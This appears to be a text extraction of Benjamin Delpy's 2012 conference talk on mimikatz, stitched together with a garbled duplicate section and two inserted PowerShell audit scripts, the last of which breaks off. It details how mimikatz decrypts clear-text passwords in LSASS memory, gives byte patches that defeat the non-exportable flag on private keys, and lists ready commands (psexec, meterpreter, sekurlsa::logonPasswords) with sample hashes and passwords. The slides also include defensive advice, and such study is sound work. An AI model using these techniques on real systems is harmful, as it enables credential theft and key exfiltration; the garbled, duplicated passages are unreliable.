- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
mimikatz / sekurlsa / wdigest: demo time
sekurlsa::wdigest
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 21
mimikatz / sekurlsa / livessp
because Microsoft was too good in closed networks
mimikatz / sekurlsa / livessp: how?
Actually, I've only used a logical (empirical) approach to search for passwords...
– Protocol reading
– Symbols searching
~ Boring ~... be more brutal this time: make a WinDbg trap!
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz / sekurlsa / livessp: how?
Let's log in with a Live account on Windows 8.
After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
Call stacks caught by the trap (kc 5), top frame first:
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider!
Yeah! Pass-the-hash capability with a Live account too...
A Live user can log on through RDP via SSO.
mimikatz / sekurlsa / livessp: workflow
Workflow: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList (KIWI_LIVESSP_LIST_ENTRY) for that LUID → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear.

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz / sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz / sekurlsa / kerberos
Let's log in with a normal account.
After credential protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
Call stacks caught by the trap (kc 5), top frame first:
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
(Kerberos ticket part? Maybe ;))

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
(Kerberos part for the password)

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz / sekurlsa / kerberos (nt6): workflow
Workflow: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear.

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz / sekurlsa / kerberos (nt5): workflow
Workflow: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList (KIWI_KERBEROS_LOGON_SESSION) for that LUID → LsaUnprotectMemory → password in clear.

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* [...] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz / sekurlsa: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz / sekurlsa / kerberos: "hu?"
Ok, it works...
But why?
Not for all logons on NT5 (can need an unlock).
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol...
– all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logical...
– For password auth:
• password hash for the shared secret, but keeping the password in memory
– For full smartcard auth:
• No password on client
• No hash on client
– NTLM hash on client...
– the KDC sent it back as a gift
mimikatz / sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them.
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process, to take advantage of its keys when we called it.
Can it be fun to decrypt outside the process? – Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too, and "imports" the keys LSASS initialized.
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS.
mimikatz / sekurlsa / LsaEncryptMemory: NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Protection keys (globals of lsasrv inside the lsass process), which mimikatz copies into its own loaded lsasrv:
– RC4: g_pRandomKey (BYTE[g_cbRandomKey]), g_cbRandomKey (DWORD, 256)
– DESx: g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8])
mimikatz / sekurlsa / LsaEncryptMemory: NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Protection keys (globals of lsasrv inside the lsass process), which mimikatz copies: InitializationVector (BYTE[16]), h3DesKey and hAesKey (handles to a KIWI_BCRYPT_KEY).

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz / sekurlsa: memo
Security packages (symbol and type of the credential container):
– tspkg: tspkg!TSGlobalCredTable (RTL_AVL_TABLE)
– wdigest: wdigest!l_LogSessList (LIST_ENTRY)
– livessp: livessp!LiveGlobalLogonSessionList (LIST_ENTRY)
– kerberos (nt5): kerberos!KerbLogonSessionList (LIST_ENTRY)
– kerberos (nt6): kerberos!KerbGlobalLogonSessionTable (RTL_AVL_TABLE)
– msv1_0: lsasrv!LogonSessionList (LIST_ENTRY), lsasrv!LogonSessionListCount (ULONG)
Protection keys, NT 5 symbols:
– RC4: lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
– DESx: lsasrv!g_pDESXKey, lsasrv!g_Feedback
Protection keys, NT 6 symbols:
– IV: lsasrv!InitializationVector
– 3DES: lsasrv!h3DesKey
– AES: lsasrv!hAesKey
mimikatz / sekurlsa: memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
    msv1_0 :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
     * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
    kerberos :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    wdigest :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    tspkg :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    livessp :
     n.t. (LUID KO)
mimikatz / sekurlsa: what we can do
Basics:
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (...)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit pass the hash: it keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth:
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic stuff:
• biometrics (it keeps the password somewhere and pushes it to Windows)
• single sign-on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take the opportunities to stop backward compatibility
– Disable faulty providers:
• Is it supported by Microsoft?
• Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
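As an added defender-side check, not from the talk and not part of mimikatz: the PowerShell below lists the security packages LSASS is configured to load and reports which of the reversible-credential packages named above (wdigest, tspkg, livessp) are actually mapped in lsass.exe. It assumes Windows PowerShell, an elevated prompt for the module listing, and reads both the Lsa key and its OSConfig subkey (where newer Windows versions keep the list).

```powershell
# Added audit script, not part of the talk or of mimikatz.
# Reports whether the packages that keep a reversible password in LSASS (wdigest, tspkg,
# livessp) are configured and loaded. Reading the registry needs no privilege; listing
# the modules of lsass.exe needs an elevated prompt.

$reversiblePackages = @('wdigest', 'tspkg', 'livessp')

function Get-ConfiguredSecurityPackages {
    # 'Security Packages' (REG_MULTI_SZ) lists the SSP/AP DLLs LSASS loads at boot.
    # Windows 8 and later keep the effective list under Lsa\OSConfig and leave the Lsa
    # value empty, so both locations are read and merged.
    $paths = @('HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
               'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig')
    $names = foreach ($p in $paths) {
        $item = Get-ItemProperty -Path $p -Name 'Security Packages' -ErrorAction SilentlyContinue
        if ($item) { @($item.'Security Packages') }
    }
    $names | Where-Object { $_ -and $_.Trim() } |
        ForEach-Object { $_.Trim().ToLowerInvariant() } | Sort-Object -Unique
}

function Get-LoadedLsassPackages {
    # DLL base names currently mapped in lsass.exe (empty, with a warning, when not elevated).
    try {
        $lsass = Get-Process -Name lsass -ErrorAction Stop
        $lsass.Modules |
            ForEach-Object { [IO.Path]::GetFileNameWithoutExtension($_.ModuleName).ToLowerInvariant() }
    } catch {
        Write-Warning "lsass module list unavailable (run elevated): $($_.Exception.Message)"
        @()
    }
}

$configured = @(Get-ConfiguredSecurityPackages)
$loaded     = @(Get-LoadedLsassPackages)

$report = foreach ($pkg in $reversiblePackages) {
    [pscustomobject]@{
        Package       = $pkg
        Configured    = ($configured -contains $pkg)
        LoadedInLsass = ($loaded -contains $pkg)
    }
}
$report | Format-Table -AutoSize

# kerberos and msv1_0 stay in the list: as noted above, they are the packages you cannot remove.
"Configured packages: $($configured -join ', ')"
```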
mimikatz / crypto: what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
• Even those which are "not" exportable
What the crypto module can do:
– List
• Providers
• Stores
• Certificates
• Keys
– Export
• Certificates
  – public, in DER format
  – with private keys, in PFX format
• Private keys in PVK format (it's cool, OpenSSL can deal with it too)
– Patch
• CryptoAPI in mimikatz context
• CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz / crypto: how it's protected
Private keys are DPAPI protected:
– You cannot reuse private key files on another computer
• At least without the master keys and/or passwords of the users
Computers/users can load their own keys because they have enough secrets to do it (e.g. an opened session)
– Yes, a computer/server opens a "session"
Export/usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
Constraint for most users. Unavailable for computer keys.
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz / crypto / capi: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
– cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz / crypto / capi: how it's exported ( level)
Flow, entirely inside the process (CryptoAPI and the RSA CSP): ask to export key → exportable? → yes: load private key (DPAPI decode) → exported key; no: NTE_BAD_KEY_STATE. The slide labels this check "PLAYSKOOL".
mimikatz / crypto / patchcapi: because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider       : Microsoft Enhanced Cryptographic Provider v1.0
    Type           : AT_KEYEXCHANGE
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz / crypto / patchcapi: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive            ; original
.text:0AC0B7CB 90                   nop                                           ; patched
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive            ; patched

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare    ; original
.text:0AC1F749 90                   nop                                           ; patched
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare    ; patched
mimikatz / crypto / patchcapi: demo time
Import, export, import as not exportable..., export
mimikatz / crypto / patchcapi: limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
• Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz / crypto / cng: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with Common Criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
– It is, but it's not perfect...
mimikatz / crypto / cng: how it's exported ( level)
Flow: the process asks CNG to export the key → RPC → KeyIso service (in the LSASS process): exportable? → yes: load private key (DPAPI decode) → exported key; no: NTE_NOT_SUPPORTED. The slide labels this check "PLAYSKOOL" here too.
NT6: System-protected process (ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP).
mimikatz / crypto / patchcng: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to ncrypt!SPCryptExportKey in lsass (keyiso).
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKeyPrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz / crypto / patchcng: because sometimes I own LSASS
This time, checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
.text:6C815210 75 1C    jnz short continue_key_export    ; original
.text:6C815210 EB 1C    jmp short continue_key_export    ; patched
mimikatz / crypto / patchcng: demo time
Import, export, import as not exportable..., export again
mimikatz / crypto / patchcng: limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
– certutil can...
mimikatz / crypto / patchcng: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz / crypto: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password:
– PFX files are protected by this password: mimikatz
Keys:
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key... funny, isn't it?
• So yes, mimikatz can export it
mimikatz / crypto: what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computer – no admin, no admin, no admin...
Basics:
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
– See what Microsoft can do with TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)
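As an added inventory script, not from the talk and not part of mimikatz: the PowerShell below walks the user and machine My stores and reports, for each certificate with a private key, whether the key is held by one of the software CSPs or the software KSP named above (where "non-exportable" is only a check in provider code) or by another provider such as a smartcard, TPM or HSM. It assumes Windows PowerShell 5.1 with .NET Framework 4.6 or later, and an elevated prompt for the machine store.

```powershell
# Added audit script, not part of the talk or of mimikatz.
# Lists certificates with a private key in the user and machine "My" stores and reports the
# API (CAPI or CNG), the provider and the export flag, so keys held by the software providers
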